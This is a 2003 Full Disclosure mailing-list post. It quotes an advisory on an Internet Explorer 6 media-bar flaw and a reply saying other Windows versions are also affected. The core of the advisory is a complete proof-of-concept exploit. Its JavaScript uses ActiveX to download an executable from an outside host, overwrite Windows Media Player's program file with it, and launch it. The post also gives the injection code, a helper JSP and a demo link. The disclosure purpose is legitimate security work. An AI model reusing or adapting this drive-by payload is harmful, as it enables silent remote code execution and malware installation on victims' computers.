Full Disclosure mailing list archives
Re: Internet explorer 6 on windows XP allows exection of arbitrary code
From: "Dj MegaWorld" <info () djmegaworld nl>
Date: Fri, 12 Sep 2003 23:56:56 +0200
Same problem occurs on windows 2000 and windows 2003 server... Greetings, Dj MegaWorld / Marius van Witzenburg "It's the music... That never fades!" Url: http://www.djmegaworld.nl/ ----- Original Message ----- From: "jelmer" <jkuperus () planet nl> To: <bugtraq () securityfocus com> Cc: <full-disclosure () lists netsys com> Sent: Friday, September 12, 2003 0:31 Subject: Internet explorer 6 on windows XP allows exection of arbitrary code
Internet explorer 6 on windows XP allows exection of arbitrary code DESCRIPTION : Yesterday Liu Die Yu released a number series of advisories concerning internet explorer by combining on of these issues with an earlier issue I myself reported a while back You can construct a specially crafted webpage that can take any action on
a
users system including but not limited to, installing trojans, keyloggers, wiping the users harddrive etc. TECHNICAL EXPLAINATION : Internet explorer 6 comes with a media sidebar in wich you can load and
play
mediaclips without even leaving the browser. when you instruct the mediabar to load a file from an unknown host or the HTTP status returned by an existing host indicates an error this media bar displays an error page inside the media bar namely res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path res URL's are treated as being in the "my computer zone" and are loaded
from
the users filesystem perfect conditions for the issue I describe on http://www.mail-archive.com/full-disclosure () lists netsys com/msg06791.html To work. now all that is needed is a way to inject this exploit code into this page This method was graciously provided by Liu Die Yu as you can read on http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0 Combining these issues we get something like : --snip-- <textarea id="code" style="display:none;"> var x = new ActiveXObject("Microsoft.XMLHTTP"); x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; s.Open(); s.Write(x.responseBody); s.SaveToFile("C:\\Program Files\\Windows Media
Player\\wmplayer.exe",2);
location.href = "mms://"; </textarea> <script language="javascript"> function preparecode(code) { result = ''; lines = code.split(/\r\n/); for (i=0;i<lines.length;i++) { line = lines[i]; line = line.replace(/^\s+/,""); line = line.replace(/\s+$/,""); line = line.replace(/'/g,"\\'"); line = line.replace(/[\\]/g,"\\\\"); line = line.replace(/[/]/g,"%2f"); if (line != '') { result += line +'\\r\\n'; } } return result; } function doit() { mycode = preparecode(document.all.code.value); myURL = "file:javascript:eval('" + mycode + "')"; window.open(myURL,"_media") } window.open("error.jsp","_media"); setTimeout("doit()", 5000); </script> --snip-- error.jsp is a jsp page that consists of one line, namely <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %> DEMONSTRATION : A demonstration is provided at : http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm WORKAROUND : Disable active scripting or do "the sensible thing" and pick another
browser
such as the excellent mozilla firebird.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Internet explorer 6 on windows XP allows exection of arbitrary code jelmer (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Kristian Hermansen (Sep 11)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Thor Larholm (Sep 11)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code Dj MegaWorld (Sep 12)
- <Possible follow-ups>
- Re: Internet explorer 6 on windows XP allows exection of arbitrary code http-equiv () excite com (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Richard M. Smith (Sep 12)
- RE: Internet explorer 6 on windows XP allows exection of arbitrary code Drew Copley (Sep 12)